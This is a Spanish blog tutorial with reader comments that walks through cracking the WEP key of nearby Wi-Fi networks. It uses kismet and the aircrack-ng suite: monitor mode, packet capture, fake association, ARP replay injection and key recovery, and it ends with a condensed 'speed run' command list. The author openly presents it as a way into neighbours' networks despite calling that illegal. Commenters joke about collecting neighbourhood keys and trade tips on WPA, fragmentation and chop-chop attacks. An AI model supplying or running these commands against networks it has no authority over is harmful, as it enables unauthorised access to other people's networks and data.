Cómo hackear redes WIFI con claves WEP

Todos hemos soñado algún día con acceder a las redes WIFI vecinas y navegar sin importar donde nos encontramos. En ocasiones es tan fácil como clicar sobre una WIFI que no tiene contraseña, pero en la mayoría de casos no es así, y cada vez más nos encontramos con claves que impiden nuestro acceso, o no. Lo que viene a continuación es un arma de doble filo. Por un lado una "lección y ponte a prueba" con las claves WEP y la seguridad de tu propia red, y por otro una guía de cómo colarse en la mayoría de las redes WIFI con contraseña, vamos, lo que Microsoft llama usuarios mal intencionados.

Un par de cosas a saber.

  • Es ilegal acceder a las redes WIFI que no son de tu propiedad.
  • Es legal experimentar tanto como quieras con tu propia WIFI ;-)
  • Para esta guía he usado un equipo SAMSUNG R40 plus (tarjeta de red Atheros) y Ubuntu 8.10.
  • Si tu tarjeta de red no es Atheros no podrás seguir el punto donde se configura en modo monitor. Gooooglea.

Un par de términos a saber.

  • AP: Punto de acceso/Access Point
  • ESSID: Nombre del AP
  • BSSID: Dirección MAC

Instalación

No voy a usar Back Track ni otras distribuciones parecidas. Considero que lo más cómodo es tenerlo todo funcionando en mi SO habitual, y este es Ubuntu. Todo el proceso lo haremos con tres aplicaciones que instalaremos en los siguientes pasos. 1. instalar kismet Kismet es una aplicación para hacer sniffer (monitorizar la red), detectar redes inalámbricas e intrusiones. Kismet solo funciona con tarjetas de red inalámbricas que soporten modo monitor (rfmon). 

#apt-get install kismet

2. Configurar kismet Una vez instalado debemos editar el archivo kismet.conf (para saber donde encontrarlo hacer un $whereis kismet.conf puede ayudar) y adaptarlo a nuestro tipo de tarjeta. Para ello editamos la linea "suiduser" especificando nuestro nombre de usuario (un usuario que tenga permisos suficiente para ejecutar kismet, como por ejemplo: root), y lo "más complicado" la linea "source" definiendo: un driver, un interface y un nombre. En mi caso (una tarjeta Atheros) la linea source ha quedado así: source=madwifi_b,wifi0,madwifi Dependiendo de la tarjeta de red de cada uno el driver y el interface variará, de manera que lo mejor es tirar de google para buscar cada caso en concreto y leerse la documentación de Kismet, que trae un apartado llamado "Capture Sources" dedicado exclusivamente a este punto. He dicho que es la parte más complicada porque he podido comprobar que mucha gente tira la toalla en este punto (yo casi lo hice), pero todo es cuestión de paciencia hasta encontrar el driver y el interface adecuado (gooooglea). 3. Instalación de aircrack-ng Aircrack-ng es una suite de herramientas que permite craquear contraseñas WEP y WPA-PSK a partir de un buen número de paquetes previamente capturados. Esta guía solo te servirá para contraseñas WEP, aunque una vez superado ya no te quedará mucho hasta las WPA. 

#apt-get install aircrack-ng

4. Instalación de las madwifi-tools. Nos permitirá hacer uso de una utilidad que incluye llamada wlanconfig, que permite poner nuestra tarjeta de red en modo monitor. 

#apt-get install madwifi-tools

Llegados a este punto tenemos todo lo necesario para realizar nuestro primer ataque.

Llevando a cabo el ataque

1. Iniciamos kismet 

$kismet

wep_kismet1

Nos aparecerá una lista de todos los APs detectados a nuestro alrededor. Ordenamos los resultados por calidad de señal pulsando "s" y luego "Q"

wep_kismet2

Nos fijamos la lista de AP´s detectados, concretamente en la columna "W". Esta muestra el tipo de encriptación de cada una, cuyo valor posible es Y/N/O, donde Y=encriptación WEP, N=Red abierta o sin encriptación, y O=Otra, normalmente WPA. Nos desplazamos con los cursores hasta el AP con encriptación WEP que nos interese, y pulsamos ENTER, mostrándose información detallada de la que nos anotaremos el canal el en que está operando (Ch), el nombre del dispositivo (ESSID) y la dirección MAC (BSSID). Con la tecla x volvemos al listado. Salimos de Kismet. 2. Modo monitor Ahora vamos a poner nuestra tarjeta de red en modo monitor. En mi caso el interface es ath0, pero en otras tarjetas de red puede cambiar. Si tu tarjeta de red no es Atheros estos pasos no te van a valer. Pues bien, detenemos el interface que tenemos en modo MANAGED. 

#airmon-ng stop ath0

Interface	Chipset		Driver

wifi0		Atheros		madwifi-ng
ath0		Atheros		madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Y lo iniciamos en modo MONITOR. 

#airmon-ng start wifi0

Interface	Chipset		Driver

wifi0		Atheros		madwifi-ng
ath0		Atheros		madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Hacemos un iwconfig para verificar que el modo de la ath0 sea "monitor" y conocer la MAC de su AP. 

$iwconfig

lo        no wireless extensions.

eth0      no wireless extensions.

wifi0     no wireless extensions.

pan0      no wireless extensions.

ath0      IEEE 802.11g  ESSID:""  Nickname:""
          Mode:Monitor  Frequency:2.457 GHz  Access Point: 00:1B:9E:06:9A:5B   
          Bit Rate:0 kb/s   Tx-Power:9 dBm   Sensitivity=1/1  
          Retry:off   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality=0/70  Signal level=-90 dBm  Noise level=-90 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

NOTA: En algunas ocasiones y aparentemente de manera aleatoria al iniciar el interface ath0 he recibido el siguiente mensaje de error: 

#airmon-ng start wifi0

Interface	Chipset		Driver

wifi0		Atheros		madwifi-ngError for wireless request "Set Frequency" (8B04) :
    SET failed on device ath0 ; No such device.
ath0: ERROR mientras se obtenían las banderas de interfaz: No existe el dispositivo

ath1		Atheros		madwifi-ng VAP (parent: wifi0)

Como puede verse no consigue iniciar el interface ath0, pero en su lugar inicia el ath1, que para el caso es lo mismo (lo importante es disponer de una interface en modo monitor). Si ocurre esto seguimos la guía cambiando en adelante cualquier ath0 que aparezca por ath1. Comprobado que funciona igual. 3. Capturando paquetes Ahora que nuestra tarjeta está en modo monitor lo siguiente que necesitamos empezar a capturar paquetes del aire y almacenarlos en nuestro ordenador para más tarde determinar la clave WEP gracias a la información que contienen. Para ello usamos airodump-ng seguido del path y el nombre del archivo donde guardaremos los paquetes, seguido del canal en el que escucharemos (sí, el mismo canal que nos apuntamos cuando habíamos ejecutados Kismet). En este caso guardaremos los paquetes en /home/juansa/archivos, y escucharemos el canal 6. 

#airodump-ng -w /home/juansa/archivos ath0 --channel 6

wep_airodump

En estos momentos todos los paquetes que viajan están siendo capturados por nuestra tarjeta y almacenados en nuestro equipo. Una vez tengamos suficientes paquetes (decenas de miles de ellos) podremos tratar de averiguar la clave. Si en la red en la que pretendemos acceder hay actividad se generarán suficientes paquetes como para poder averiguar más tarde la clave WEP, pero si es una red en la que no hay actividad, o simplemente queremos acelerar el proceso de recaudo de paquetes, nos toca a nosotros organizarle una fiesta al router. 4. Generando tráfico Vamos a generar tráfico en el router de manera que podamos capturar con más velocidad. Lo primero será mandarle un paquete de asociación al AP que tenemos en el punto de mira, (como una tarjeta de invitación). Lo hacemos especificando el ESSID del AP, la MAC del AP, nuestra MAC y nuestro interface (aireplay-ng -1 0 -e AP_ESSID -a AP_MAC -h MI_MAC MI_INTERFACE). Abrimos una nuevo terminal y... 

#aireplay-ng -1 0 -e Wireless -a 00:C2:C2:C1:CF:A8 -h 06:FB:9E:06:2A:5B ath0

The interface MAC (00:1C:3E:56:2A:5B) doesn´t match the specified MAC (-h).
	ifconfig ath0 hw ether 06:FB:9E:06:2A:5B
20:22:37  Waiting for beacon frame (BSSID: 00:C2:C2:C1:CF:A8) on channel 6

20:22:37  Sending Authentication Request (Open System)
20:22:37  Authentication successful
20:22:37  Sending Association Request
20:22:37  Association successful :-) (AID: 1)

Ya estamos asociados al AP. A partir de estos momentos podemos mandarle al AP cualquier paquete que vaya encriptado con su debida WEP, y como no la conocemos, le enviaremos los mismos paquetes encriptados que el nos envie a nosotros. ;-) (aireplay-ng -3 -b AP_MAC -h MI_MAC) 

#aireplay-ng -3 -b 00:C2:C2:C1:CF:A8 -h 06:FB:9E:06:2A:5B ath0

wep_airodump_inject

5. Resolviendo la clave WEP Poco a poco veremos que vamos capturando paquetes (sobre todo los que nos interesan son los paquetes ARP). Una vez tengamos a partir de 100.000 paquetes (columna #Data de airodump-ng) podemos ir pensando en descifrar la clave, pero lo mejor es llegar al menos hasta los 500.000. No obstante lo mejor es ir probando a descifrarla sin detener el proceso. ¡Claro que se puede! En una nueva consola ejecutamos: 

#aircrack-ng -s /home/juansa/archivos.cap

Es posible que el nombre no sea el mismo con extensión .cap así que asegúrate antes de qué nombre está tomando el archivo.

wep_descifrando wep_clave

6. Conclusión Nunca, pero nunca nunca nuca, uses una clave WEP en tu router.

Bonus track: Ataque en Speed Run

sudo kismet
sudo airmon-ng stop ath0
sudo airmon-ng start wifi0
sudo airodump-ng -w /home/juansa/archivos ath0 --channel 6
sudo aireplay-ng -1 0 -e Wireless -a 00:00:00:00:00:00 -h 00:00:00:00:00:00 ath0
sudo aireplay-ng -3 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 ath0
sudo aircrack-ng -s archivos.cap

16-12-2008


Comentarios:

17-12-2008 | aleborhedeham A ver cuando nos montamos un war-bike en casa de Mato!

19-12-2008 | Meonder Cuanto suele tardar un proceso así?
Es ilegal acceder a una WIFI que no es de nuestra propiedad, pero no es ilegal descifrar WEPS no? es decir podriamos hacer colección del vecindario sin quebrantar la ley.

19-12-2008 | JuanSa Todo depende de cuanto tráfico haya en la red en el momento de esnifar paquetes, pero suele tardar unos 5 minutos.

No creo que sea muy legal hacerse la colección de WEPs del vecindario, pero divertido un rato.

20-12-2008 | fgjksdfk esto apesta

20-12-2008 | Alberto idem a fgjksdfk

28-12-2008 | Abraham Gracias por la información se agradece

31-12-2008 | Luis Hola!, oye un favorsote mira estoy en la duda se aplica el mismo método para poder descifrar una clave WPA? o acaso hay otro procedimiento?.

En caso de que haya otro procedimiento podrías ponerlo? es que me interesa (jaja, claro para aprendizaje sólamente XD)

03-01-2009 | SaveR @Luis no he llegado a probar con claves WPA, pero tengo entendido que todo es lo mismo, solo que al ejecutar aircrack-ng hay que indicar además un archivo que haga de diccionario. Suerte!

13-01-2009 | panchodh ESTIMADO AL EJECUTAR

$Kisme

me aparace el siguiente error

Launching kismet_server: //usr/bin/kismet_server
Suid priv-dropping disabled. This may not be secure.
No specific sources given to be enabled, all will be enabled.
Non-RFMon VAPs will be destroyed on multi-vap interfaces (ie, madwifi-ng)
Enabling channel hopping.
Enabling channel splitting.
NOTICE: Disabling channel hopping, no enabled sources are able to change channel.
Source 0 (madwifi): Enabling monitor mode for madwifi_b source interface eth0 channel 6...
ERROR: Unable to create VAP: Operation not supported
ERROR: Unable to create monitor-mode VAP
WARNING: eth0 appears to not accept the Madwifi-NG controls. Will attempt to configure it as a standard Madwifi-old interface. If you are using madwifi-ng, be sure to set the source interface to the wifiX control interface, NOT athX
FATAL: channel get ioctl failed 95:Operation not supported
Done.

Si me pudieras ayudar seria genial

13-01-2009 | SaveR @panchodh es posible que tu tarjeta de red no soporte el modo monitor. ¿Qué tarjeta usas?, ¿qué valores has puesto en el archivo de configuración de Kismet?

Prueba tambien lo siguiente a ver si así consigues activar el mono monitor:

ifconfig eth0 down
iwconfig eth0 mode Monitor
ifconfig up

07-02-2009 | //.arce Lo he probado. Hay que ver, es sorprendentemente fácil, te lo dan mascado.

01-03-2009 | fer llevo 2 horas snifando paketes y el apartado data solo tiene 1376, el apartado beacons 101385. Es normal ke tarde tanto??

03-03-2009 | yunlongzhuyunlong puse kismet y me sale una serie de textos. uso VMware 6.5 para emular ubuntu 8.10.
alguien me puede ayudar??

03-03-2009 | SaveR @fer: Ocurre ocurre. Estarás demasiado lejos del punto de acceso o no se está generando suficiente tráfico. El truco está en acercarse todo lo posible. Usa kismet para medir la calidad de la señal.

@yunlongzhuyunlong : Pega el texto que aparece, pero tal vez el problema sea que Kismet es incapaz de poner la tarjeta de red en modo monitor. Asegúrate de que esto se puede hacer cuando se está usando VMware, que no sé, pero no creo que se pueda...l

18-03-2009 | alex No he sido capaz de hacer funcionar el kismet aunque he solucionado el problema consultando por otro lado http://foro.el-hacker.com/index.php/topic,163688.0.html y luego aplicando el modo de generar trafico y funciona bastante bien, a mi me ha tardado bastante, inesperiencia supongo, pero merece la pena.
Un saludo

29-03-2009 | SaveR @alex la velocidad está muy relacionada con lo cerca que estés del punto de acceso y de los equipos que se encuentren ya conectados a este. Cuanto más cerca y si hay gente conectada y generando tráfico mejores resultados obtendrás. En cualquier caso es importante que dediques un rato a ver los distintos ataques que permite aireplay-ng para influir en que se genere más tráfico del previsto.

30-03-2009 | raymox pues a mi me sale esto creo que el problema es con mi kismet.conf pero no c donde este el problema

raymox@raymox-laptop:/etc/kismet$ sudo kismet
Launching kismet_server: //usr/bin/kismet_server
Suid priv-dropping disabled. This may not be secure.
No specific sources given to be enabled, all will be enabled.
Non-RFMon VAPs will be destroyed on multi-vap interfaces (ie, madwifi-ng)
Enabling channel hopping.
Enabling channel splitting.
NOTICE: Disabling channel hopping, no enabled sources are able to change channel.
Source 0 (atheros): Enabling monitor mode for ath5k source interface wifi0 channel 6...
FATAL: mode get ioctl failed 95:Operation not supported
Done.


lo que tenngo en el kismet.conf

# Version of Kismet config
version=2007.09.R1

# Name of server (Purely for organizational purposes)
servername=Kismet

# User to setid to (should be your normal user)
#suiduser=your_user_here
suiduser=root

# Do we try to put networkmanager to sleep? If you use NM, this is probably
# what you want to do, so that it will leave the interfaces alone while
# Kismet is using them. This requires DBus support!
networkmanagersleep=true

# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README under the
# CAPTURE SOURCES section.
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.
# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
source=ath5k,wifi0,atheros
#source=madwifi_b,wifi0,raymox


mi targeta de red es:
03:00.0 Ethernet controller: Atheros Communications Inc. AR242x 802.11abg Wireless PCI Express Adapter (rev 01)

si me pudieran alludar a correr el kismet se los agadeceria mill

05-04-2009 | SaveR @raymox prueba cambiando el source a: madwifi_b,wlan0,raymox
o ath5k,wlan0,raymox

Si no postea aquí el resultado del comando #iwconfig para que lo veamos.

08-05-2009 | Nena Hola, aunque aun no he llegado al fin de tu tuturial (q me parece la madre por cierto xD) encontre la linea del source correspondiente a las broadcom, es: source=bcm43xx,eth1,broadcom
creo q hay dos opciones mas en las q el bcm43xx se reemplaza, del resto es igual.

10-05-2009 | SaveR @Nena gracias por tu aportación!

13-05-2009 | Anon Para los que estén usando una eeepc con atheros la linea source en el kismet.conf debe quedar:
source = madwifi_g,wifi0,wifi0

15-05-2009 | SaveR @Anon gracias!

30-05-2009 | jesus oye kuate es un gran aporte pero es un alastima q no se usar linuxx

14-06-2009 | Lobezno Si os encontrais muy lejos del punto de acceso , ayuda bastante bajar la velocidad a 1M.

iwconfig wlan0 rate 1M , según el interfaz de red que utiliceis, en mi caso es reconocido como rausb0 (un conceptronic usb c54ru).

A veces hay que fraguar un ARP con packet-forge por medio de un ataque previo de fragmentación ó chop-chop para conseguir aumentar la tasa de IVS ya que hay APs un poco durillos que no responden con un ataque convencional, pero en los tutoriales del aircrack-ng podreís encontrar muchos trucos para aumentar la captura de IVS.

21-06-2009 | SaveR @Lobezno recurrir al packet-forge cada vez me está siendo más necesario. A ver si amplio el tutorial y pongo algún ejemplo de su uso. Gracias!

24-02-2010 | nelson la duda que me queda es que al poner "modo monitor" supongo que ya no podes conectarte a internet, así que deberíamos volver al modo convencional, ¿o vuelve solo?, pregunto porque mi conección es inalámbrica y si hago eso tengo miedo de no poder volver a navegar para encontrar una solución

24-02-2010 | //.arce @nelson Para poner la tarjeta en modo normal yo uso:
sudo modprobe -r iwlagn
sudo modprobe iwlagn
Donde iwlagn es el módulo de la tarjeta (una Intel Pro Wireless). Y si no reinicias.

09-03-2010 | SaveR @nelson como bien dice @//.arce cuando reinicies tu ordenador todo volverá a estar como antes.

25-03-2010 | Lack hola... he intentado conseguir segun como lo has mostrado y no he tenido exito aun con ello... pregunto: ¿por que me aparecen las potencias negativas? y ¿que solucion puede haber? gracias.

25-03-2010 | SaveR @lack si haciendo todos los pasos no consigues capturar paquetes casi siempre se debe a que estás demasiado lejos. ¿Has probado cambiando de lugar?.

Creo que las potencias negativas indican sobre amplificación. No recuerdo haber conseguido capturar paquetes cuando la potencia es negativa.

25-03-2010 | Lack Entiendo, intentare estar mas cerca. he capturado paquetes (unos 3554 IVs) pero no los suficientes, segun entiendo. Algo mas no entendi lo de "sobre amplificacion". Gracias.

20-05-2010 | PitBull La tarjeta a capturar que tiene que se la de Ethernet o la de wifi? entiendo que la de wifi verdad? es que tengo un eeepc 1000h y tiene ethernet controler Atheros y wireles interface RT2860 de RaLink, y tambien me sale el error de los compañeros al incinar kismet "this may be secure"

alguna sugerencia? muchas gracias y felicidades por el manual a ver si lo consigo jeje saludos!

01-10-2011 | teros al encontrar la clave web se conecta automaticamente o se tiene que setear cuando te pide la contrase;a saludos

12-10-2011 | job existe back track 4 si tienes win no lo tienes que desinstalar solo tienes que poner el disco al boteo de la compu y es mas facil hakear con el super sencillo
explicacion a fondo n_n

http://foro.elhacker.net/hacking_wireless/manual_backtrack_4-t312926.0.html

05-04-2012 | refael loguiero

09-02-2013 |

Pues yo pienso que:


Suscribirse

Suscribirse

Posts

Comentarios

Comentarios